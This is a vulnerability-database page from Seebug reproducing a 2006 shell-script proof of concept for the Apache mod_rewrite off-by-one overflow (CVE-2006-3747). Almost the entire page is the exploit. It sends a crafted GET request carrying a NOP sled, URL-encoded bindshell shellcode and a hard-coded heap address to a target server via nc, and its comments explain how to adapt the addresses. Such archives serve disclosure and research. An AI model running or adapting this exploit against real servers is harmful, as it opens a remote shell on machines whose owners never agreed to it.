Lucene search

K
seebugRootSSV:63874
HistoryJul 01, 2014 - 12:00 a.m.

Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC

2014-07-0100:00:00
Root
www.seebug.org
91

0.974 High

EPSS

Percentile

99.9%

No description provided by source.


                                                #!/bin/sh
# Exploit for Apache mod_rewrite off-by-one.
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
# 
# by jack &#60;jack\x40gulcas\x2Eorg&#62;
# 2006-08-20
#
# Thx to xuso for help me with the shellcode.
#
# I suppose that you&#39;ve the &#34;RewriteRule kung/(.*) $1&#34; rule if not
# you must recalculate adressess.
#
# Shellcode is based on Taeho Oh bindshell on port 30464 and modified
# for avoiding apache url-escape.. Take a look is quite nice ;)
#
# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
# 0x0834ae77 for any other version/system find it.
#
# Gulcas rulez :P

echo -e &#34;mod_rewrite apache off-by-one overflow&#34;
echo    &#34;by jack &#60;jack\x40gulcas\x2eorg&#62;\n\n&#34;

if [ $# -ne 1 ] ; then
  echo &#34;Usage: $0 webserver&#34;
  exit
fi

host=$1

echo -ne &#34;GET /kung/ldap://localhost/`perl -e &#39;print &#34;%90&#34;x128&#39;`%89%e6\
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
Host: $host\r\n\r\n&#34; | nc $host 80

# milw0rm.com [2006-08-21]